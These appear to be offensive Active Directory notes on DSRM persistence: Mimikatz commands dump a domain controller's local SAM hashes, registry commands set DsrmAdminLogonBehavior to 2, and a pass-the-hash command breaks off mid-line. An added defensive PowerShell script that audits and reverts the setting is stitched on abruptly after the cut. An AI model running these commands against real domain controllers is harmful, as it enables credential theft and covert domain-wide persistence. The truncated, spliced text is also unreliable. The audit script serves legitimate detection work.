DSRM
Directory Services Restore Mode
Dump the DSRM password (this dumps the DC's local SAM accounts); look for the local Administrator entry:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <target>

Change the logon behavior for the DSRM local admin on the DC:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2

Pass the hash for the local admin:
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer> /user:Administrator /ntlm:<hash> /run:powers
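The registry change above is the part of this technique a defender can audit directly. The following script is an added example, not part of the original notes: it checks every domain controller for a non-default DsrmAdminLogonBehavior value and can remove it. It assumes the ActiveDirectory module and WinRM access to the DCs; the -Remediate switch name is chosen here.

```powershell
# Added example: audit all DCs for DsrmAdminLogonBehavior and optionally restore the default.
# Assumes the ActiveDirectory module and WinRM access to each DC (not from the original notes).
param([switch]$Remediate)

Import-Module ActiveDirectory

$regPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'

# Documented meaning of the value: absent/0 = DSRM account usable only when the DC is booted
# into DSRM; 1 = also usable while AD DS is stopped; 2 = usable at any time (the setting the
# notes above rely on for persistence).
$meaning = @{ 0 = 'default (DSRM only)'; 1 = 'when AD DS is stopped'; 2 = 'always (persistence risk)' }

$dcs = (Get-ADDomainController -Filter *).HostName

$results = Invoke-Command -ComputerName $dcs -ArgumentList $regPath, $valueName, $Remediate.IsPresent -ScriptBlock {
    param($path, $name, $fix)
    # A missing value is equivalent to 0, so treat "absent" as the safe default.
    $item  = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
    $value = if ($null -eq $item) { 0 } else { [int]$item.$name }
    $removed = $false
    if ($fix -and $value -ne 0) {
        # Restoring the default means deleting the value rather than setting it to 0.
        Remove-ItemProperty -Path $path -Name $name
        $removed = $true
    }
    [pscustomobject]@{ DC = $env:COMPUTERNAME; Value = $value; Remediated = $removed }
}

foreach ($r in ($results | Sort-Object DC)) {
    $flag   = if ($r.Value -ne 0) { 'ALERT' } else { 'ok' }
    $suffix = if ($r.Remediated) { ' -> value removed' } else { '' }
    $desc   = if ($meaning.ContainsKey([int]$r.Value)) { $meaning[[int]$r.Value] } else { 'unknown value' }
    '{0,-6} {1,-25} {2} = {3} ({4}){5}' -f $flag, $r.DC, $valueName, $r.Value, $desc, $suffix
}
```

Run it on a schedule and pair it with an audit SACL on the Lsa key so that a change to this value also produces Security event 4657 (registry value modified) on the DC.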